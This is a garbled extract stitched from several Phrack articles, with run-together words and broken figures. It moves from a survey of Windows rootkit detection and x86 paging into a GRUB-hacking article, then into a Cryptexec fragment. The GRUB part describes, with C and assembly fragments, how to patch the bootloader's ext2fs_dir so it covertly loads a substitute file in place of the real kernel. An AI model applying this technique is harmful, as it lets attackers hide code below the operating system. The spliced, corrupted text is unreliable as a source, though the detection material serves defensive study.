companies continued to use the samedetectionmethodsthemostprominent onebeingsignaturescansontheflesystem. Thisisonlypartiallyeffective.Oncearootkit is loaded in memory is can delete itselfon disk, hide its fles, or even divert an attempt to open the rootkit fle. In this section, we will examine morerecent advances in rootkit detection. 1.2 - Detecting The Effect Of A Rootkit (Heuristics)One method to detect the presence ofa rootkit is to detect how it altersother parameters on the computer system. In this way, the effects ofthe rootkit are seen although the actual rootkit thatcausedthedeviationmaynotbeknown. This solution is a more general approach since no signature for a particular rootkit is necessary. This technique is also looking for the rootkit in memory and not on the fle system. Oneeffectof arootkitisthatitusuallyalters theexecutionpathof anormalprogram.By insertingitself inthemiddleof aprograms execution, the rootkit can act as a middle man between the kernel functions the program relies uponandtheprogram.Withthispositionofpower, the rootkit can alter what the program seesanddoes.Forexample,therootkitcould returnahandletoalogflethatisdifferent fromtheonetheprogramintendedtoopen, or the rootkit could change the destination ofnetwork communication. These rootkit patches or hooks cause extra instructions to be executed. Whenapatchedfunctioniscomparedtoa normal function, the difference in the number of instructionsexecutedcanbeindicative of arootkit.Thisisthetechniqueusedby PatchFinder[5].Oneof thedrawbacksofPatchFinder is that the CPU must be put into single step mode in order to count instructions. So for every instruction executed an interrupt isfredandmustbehandled.Thisslowsthe performanceof thesystem,whichmaybe unacceptableonaproductionmachine.Also, theactualnumberof instructionsexecuted canvaryevenonacleansystem.Another rootkitdetectiontoolcalledVICEdetectsthe presenceof hooksinapplicationsandinthe kernel.VICEanalyzestheaddressesof the functionsexportedbytheoperatingsystem lookingforhooks.Theexportedfunctions aretypicallythetargetof rootkitsbecause byflteringcertainAPIsrootkitscanhide.By fnding the hooks themselves, VICE avoids the problems associated with instruction counting. However,VICEalsoreliesuponseveralAPIs soit ispossible forarootkit to defeat its hook detection [6]. Currently the biggest weakness ofVICE is that it detects all hooks both malicious and benign. Hooking is a legitimate technique used by many security products. Anotherapproachtodetectingtheeffectsofarootkitistoidentifytheoperatingsystem lying.Theoperatingsystemexposesawell-known API inorder for applications to interact with it. When the rootkit alters the results ofa particular API, it is a lie. For example, Windows Explorer may request the number offles in a directory using several functions in the Win32 API. Ifthe rootkit changes the number offles that the application can see, it is a lie. To detect thelie,arootkitdetectorneedsatleasttwo waystoobtainthesameinformation.Then, both results can be compared. RootkitRevealer www.phrack.orq 41Raising The Bar For Windows Rootkit Detection[7] uses this technique. It calls the highest level APIs and compares those results with the results of thelowestlevelAPIs.Thismethodcanbe bypassedbyarootkitif italsohooksatthose lowestlayers.RootkitRevealeralsodoesnot address data alterations. The FU rootkit alters thekerneldatastructuresinordertohideits processes. RootkitRevealer does not detect this because both the higher and lower layer APIs returnthesamealtereddataset.Blacklight from F-Secure [8] also tries to detect deviations fromthetruth.Todetecthiddenprocesses,it reliesonanundocumentedkernelstructure. Just as FU walks the linked list ofprocesses to hide,Blacklightwalksalinkedlistof handle tables in the kernel. Every process has a handle table;therefore,byidentifyingallthehandle tablesBlacklightcanfndapointertoevery process on the computer. FU has been updated toalsounhookthehiddenprocessfromthe linked list ofhandle tables. This arms race will continue.1.2 - Detecting the Rootkit Itself (Signatures)Anti-virus companies have shown that scanning flesystemsforsignaturescanbeeffective; however,itcanbesubverted.If theattacker camoufagesthebinarybyusingapacking routine,thesignaturemaynolongermatch the rootkit. A signature ofthe rootkit as it will executeinmemoryisonewaytosolvethis problem. Some host based intrusion prevention systems (HIPS) try to prevent the rootkit from loading.However,itisextremelydiffcultto blockallthewayscodecanbeloadedinthe kernel.RecentpapersbyJackBarnaby[9] and Chong [10] have highlighted the threat ofkernel exploits, which will allow arbitrary code to be loaded into memory and executed.Althoughflesystemscansandloading detectionareneeded,perhapsthelastlayer of detectionisscanningmemoryitself.This providesanaddedlayerof securityif the rootkithasbypassedthepreviouschecks. Memorysignatures are more reliable because the rootkit must unpack or unencrypt in order to execute. Not only can scanning memory be usedtofndarootkit,itcanbeusedtoverify theintegrityof thekernelitself sinceithasa knownsignature.Scanningkernelmemory isalsomuchfasterthanscanningeverything ondisk.Arbaughet.al.[11]havetakenthis techniquetothenextlevelbyimplementing thescanneronaseparatecardwithitsown CPU. Thenextsectionwillexplainthememory architecture on Intel x86. 2 - Memory Architecture ReviewInearlycomputinghistory,programmers wereconstrainedbytheamountof physical memory contained in a system.Ifa program wastoolargetoftintomemory,itwasthe programmersresponsibilitytodividethe programintopiecesthatcouldbeloaded andunloadedondemand.Thesepieceswere calledoverlays.Forcingthistypeof memory managementuponuserlevelprogrammers increasedcodecomplexityandprogramming errorswhilereducingeffciency.Virtual memory was invented to relieve programmers ofthese burdens.2.1 - Virtual Memory - Paging vs. SegmentationVirtualmemoryisbasedupontheseparation ofthe virtual and physical address spaces. The sizeof thevirtualaddressspaceisprimarily afunctionof thewidthof theaddressbus whereas the size ofthe physical address space is dependent upon the quantity ofRAM installed in the system. Thus, a system possessing a 32 bit busiscapableof addressing2^32(or~4GB) physicalbytesof contiguousmemory.Itmay, however, not have anywhere near that quantity of RAMinstalled.If thisisthecase,then thevirtualaddressspacewillbelargerthan thephysicaladdressspace.Virtualmemory dividesboththevirtualandphysicaladdress www.phrack.orq 42Raising The Bar For Windows Rootkit Detectionspacesintofxedsizeblocks.Iftheseblocksareallthesamesize, thesystemissaidtouseapaging memorymodel.If theblocksare varyingsizes,itisconsideredto beasegmentationmodel.The x86 architecture is in fact a hybrid, utlizingbothsegementationand paging, however, this article focuses primarilyuponexploitationof its paging mechanism. Underapagingmodel,blocksofvirtualmemoryarereferredto aspagesandblocksof physical memoryarereferredtoas frames.Eachvirtualpagemaps toadesignatedphysicalframe. Thisiswhatenablesthevirtual addressspaceseenbyprograms tobelargerthantheamountofphysicallyaddressablememory (i.e. there may be more pages than physical frames). It also means that virtuallycontiguouspagesdonot havetobephysicallycontiguous. Thesepointsareillustratedby Figure 1.2.2 - Page Tables & PTEsThemappinginformationthat connectsavirtualaddresswithits physicalframeisstoredinpage tables in structures known as PTEs. PTEs also store status information. Status bits mayindicate,forexample,weatherornota pageisvalid(physicallypresentinmemory versus stored on disk),ifit is writable, or ifit is a user / supervisor page. Figure 2 shows the format for an x86 PTE.2.4 - Virtual To Physical Address TranslationVirtualaddressesencodetheinformation necessary to fnd their PTEs inthe page table. They are divided into 2 basic parts: the virtual pagenumber and the byte index.The virtualpagenumberprovidestheindexinto thepagetablewhilethebyteindexprovides anoffsetintothephysicalframe.Whena memoryreferenceoccurs,thePTEforthe page is looked up in the page table by adding the page table base address to the virtual page number * PTE entry size. The base address ofthe page in physical memory is then extracted fromthePTEandcombinedwiththebyte offsettodefnethephysicalmemoryaddress that is sent to the memory unit.Ifthe virtual VIRTUAL ADDRESSPHYSICAL ADDRESS SPACESPACE

/-------------\/-------------\ | || | | PAGE 01 |---\ /----------->>>|FRAME 01 | | | | || | --------------- | |--------------- | | | || | | PAGE 02 |------------------->>>|FRAME 02 | | | | || | --------------- | |--------------- | | | || | | PAGE 03 | \---|----------->>>|FRAME 03 | | | || | --------------- |\-------------/ | | |

| PAGE 04 | |

| | |

|-------------| |

| | |

| PAGE 05 |-------/

| |

\-------------/

Figure 1 - Virtual To Physical Memory Mapping (Paging) NOTE: 1. Virtual & physical address spaces are divided into fixed size blocks. 2. The virtual address space may be larger than the physical address space. 3. Virtually contiguous blocks to not have to be mapped to physically contiguous frames. www.phrack.orq 43Raising The Bar For Windows Rootkit Detectionaddressspaceis particularlylarge andthepagesize relativelysmall,it standstoreason that it will require alargepage tabletoholdall of themapping information.And asthepagetable mustremain residentinmain memory,alarge table can be costly. Onesolutionto thisdilemmaisto useamulti-levelpagingscheme.Atwo-level paging scheme, in effect, pages the page table. Itfurthersubdividesthevirtualpagenumber intoapagedirectoryandapagetableindex. The page directory is simply a table ofpointers topagetables.Thistwolevelpagingscheme istheonesupportedbythex86.Figure3 illustrates how the virtual address is divided up toindexthepagedirectoryandpagetables and Figure 4 illustrates the process ofaddress translation.A memory access under a 2 level paging scheme potentiallyinvolvesthefollowingsequenceofsteps.

1. Lookup ofpage directory entry (PDE). PageDirectoryEntry = Page Directory Base Address + sizeof(PDE) *PageDirectory Index(extractedfrom virtualaddressthat causedthememory access) NOTE:Windows mapsthepage directory to virtual address 0xC0300000. Baseaddressesforpagedirectoriesare alsolocatedinKPROCESSblocksand theregistercr3containsthephysical address ofthe current page directory. 2. Lookup ofpage table entry.PageTableEntry=PageTableBase Address + sizeof(PTE) * Page Table Index (extracted from virtual address that caused the memory access). NOTE: Windows maps the page directory to virtual address 0xC0000000. The base physical address for the page table is also stored in the page directory entry.

Valid------+--------->-------+ load stage2 + +------+------+| +--------------- stage1.5) -> stage2. Everything isinposition.asm.Swillswitchtoprotected mode,open/boot/grub/grub.conf(ormenu.lst),getconfguration,displaymenus,and waitforusersinteraction.Afteruserchooses thekernel,grubloadsthespecifedkernel image(sometimesramdiskimagealso),then boots the kernel.1.4 - Grub utilIf yourgrubisoverwrittenbyWindows,you can use grub util to reinstall grub.[content omitted, please see electronic version]We can see grub util tries to embed stage1.5 ifpossible. Ifgrub is installed in MBR, stage1.5 is located after MBR, 22 sectors in size. Ifgrub isinstalledinbootsector,theresnotenough space to embed stage1.5(superblock is at offset 0x400forext2/ext3partition,only0x200for stage1.5), so the embed command fails. Refertogrubmanualandsourcecodesfor more info.2.0 - Possibility to load specifed fleGrub has its own mini-fle-system for ext2/3. It use grub_open(), grub_read() and grub_close() to open/read/close a fle. Now, take a look atext2fs_dir[content omitted, please see electronic version]Suppose the line in grub.confis:www.phrack.orq bBHacking Grub for fun and profitkernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1grub_open calls ext2fs_dir(/boot/vmlinuz-2.6.11 ro root=/dev/hda1),ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to get data ofany offset(themapresidesinINODE->i_blocks[] for direct blocks).The internal ofext2fs_dir is:1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1^inode=EXT2_ROOT_INO,putinode info in INODE;2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1^ fnd dentry in /, then put the inode info of/boot in INODE;3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1 ^ fnd dentry in /boot, then put the inode info of/boot/vmlinuz-2.6.11 in INODE;4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1^thepointerisspace,INODEisregular fle, returns 1(success), INODE contains info about /boot/vmlinuz-2.6.11.Ifwe parasitize this code, and return inode info of fle_fake,grubwillhappilyloadfle_fake, considering it as /boot/vmlinuz-2.6.11.We can do this:1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1^ inode = EXT2_ROOT_INO;2. boot/vmlinuz-2.6.11 ro root=/dev/hda1^ change it to 0x0, change EXT2_ROOT_INO to inode offle_fake;3. boot/vmlinuz-2.6.11 ro root=/dev/hda1^EXT2_ROOT_INO(fle_fake)infois inINODE,thepointeris0x0,INODEis regular fle, returns 1.Sincewechangetheargumentof ext2fs_dir, does it have side-effects?Dontforgetthelatterpartroroot=/dev/hda1,itstheparameterpassedtokernel. Without it, the kernel wont boot correctly. (P.S.:Justcat/proc/cmdlinetoseethe parameter your kernel has.)So,letschecktheinternalof kernel=... kernel_func processes the kernel=... linestatic intkernel_func (char *arg, int flags){.../* Copy the command-line to MB_CMDLINE.*/grub_memmove (mb_cmdline, arg, len + 1);kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);...}See? The arg and mb_cmdline have 2 copies ofstring/boot/vmlinuz-2.6.11roroot=/dev/hda1(thereisnooverlap,soinfact,grub_memmoveisthesameasgrub_memcpy).In load_image, you can fnd arg and mb_cmdline dont mix with each other. So, the conclusion is - NO side-effects. Ifyoure not confdent, you can add some codes to get things back.3.0 - Hacking techniquesThe hacking techniques should be general for allgrubversions(excludegrub-ng)shipped with all linux distos.3.1 - how to load fle_fakeWe can add a jump at the beginning ofext2fs_dir, then make the frst character ofext2fs_dirs argumentto0,makecurrent_ino=EXT2_ROOT_INOtocurrent_ino=INODE_OF_FAKE_FILE, then jump back. Attention:Onlywhencertainconditionis met can you load fle_fake.e.g.: When system wantstoopen/boot/vmlinuz-2.6.11,then/boot/fle_fakeisreturned;whilewhensystem wants /boot/grub/grub.conf, the correct fleshouldbereturned.If thecodesstillreturn/www.phrack.orq b9Hacking Grub for fun and profitboot/fle_fake, oops, no menu display.Jump is easy, but how to make current_ino = INODE_OF_FAKE_FILE? int ext2fs_dir (char *dirname) {int current_ino = EXT2_ROOT_INO; /*start at the root */int updir_ino = current_ino;/* the parent of the current directory */ ...EXT2_ROOT_INOis2,socurrent_ino andupdir_inoareinitializedto2.The correspondentassemblycodeshouldbelike movl $2, 0xffffXXXX($esp) But keep in mind of optimization:bothcurrent_inoandupdir_ino are assigned to 2, the optimized result can be movl $2, 0xffffXXXX($esp) and movl $2, 0xffffYYYY($esp),ormovl$2,%regthen movl %reg, 0xffffXXXX($esp) movl %reg, 0xffffYYYY($esp),ormorevariants.The type is int, value is 2, so the possibility ofxor %eax, %eax; inc %eax;inc %eax is low, its also the same to xor %eax, %eax; movb $0x2, %al.What we need is to search 0x00000002 from ext2fs_dir to ext2fs_dir +depth (e.g.: 100 bytes),thenchange0x00000002toINODE_OF_FAKE_FILE.[content omitted, please see electronic version]3.2 - how to locate ext2fs_dirThats the diffcult part. stage2 is generated by objcopy,soallELFinformationarestripped -NOSYMBOLTABLE!Wemustfndsome PATTERNs to locate ext2fs_dir.The first choice is log2:#define long2(n) ffz(~(n))static __inline__ unsigned longffz (unsigned long word){__asm__ (bsfl %1, %0:=r (word):r (~word));return word;}group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));Thequestionis,ffzisdeclaredas__inline__, which indicates MAYBE this function is inlined, MAYBE not. So we give it up.NextchoiceisSUPERBLOCK->s_inodes_per_group ingroup_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);#define RAW_ADDR(x) (x)#define FSYS_BUF RAW_ADDR(0x68000)#define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))struct ext2_super_block{...__u32 s_inodes_per_group/* # Inodes per group */...}ThenwecalculateSUPERBLOCK->s_inodes_per_group is at 0x68028. This address onlyappearsinext2fs_dir,sothepossibility of collisionislow.Afterlocating0x68028,we move backwards to get the start ofext2fs_dir. Here comes another question, how to identify thestartof ext2fs_dir?Of courseyoucan searchbackwardsfor0xc3,likelyitsret.But what ifits only part ofan instruction such as operands? Also, sometimes, gcc adds some junk codes to make function address aligned(4byte/8byte/16byte),thenhowtoskipthesejunk codes? Just list all the possible combinations?This method is practical, but not ideal.Now, we noticed fsys_table:struct fsys_entry fsys_table[NUM_FSYS + 1] ={...# ifdef FSYS_FAT{fat, fat_mount, fat_read, fat_dir, 0, 0},# endif# ifdef FSYS_EXT2FS{ext2fs, ext2fs_mount, ext2fs_www.phrack.orq 0Hacking Grub for fun and profitread, ext2fs_dir, 0, 0},# endif# ifdef FSYS_MINIX{minix, minix_mount, minix_read, minix_dir, 0, 0},# endif...};fsys_table is called like this:if ((*(fsys_table[fsys_type].mount_func)) () != 1)So, our trick is: 1.Searchstage2forstringext2fs,get itsoffset,thenconvertittomemory address(stage2startsfrom0800:0000) addr_1.2.Searchstage2foraddr_1,getitsoffset, thengetnext5integers(A,B,C,D, E),Ap_lock != 0) flag |= C_BAD;/* twice */+ diza->p_lock = c;+ continue; } break;I also needed to remove __cdecl on functions, a feature ofWin32 C compilers not needed on UNIX platforms.3.5 - Limitations*XDE engine (probably) cant handle new instructions (SSE, MMX, etc.). For certain it cant handle 3dNow! because they begin with 0x0F 0x0F, a byte sequence for which theXDEclaimsisaninvalidinstruction encoding.*Thetracersharesthesamememory withthetracedprogram.If thetraced program is so badly broken that it writes to (random) memory it doesnt own, it can stumbleuponandoverwriteportionsofthe tracing routine.*Eachformof tracinghasitsownspeed impacts. I didnt measure how much this www.phrack.orq B2Cryptexec: Next-generation Runtime Binary Encryption Using On-demand Function Extractionmethodslowsdownprogramexecution (especially compared to ptrace()).*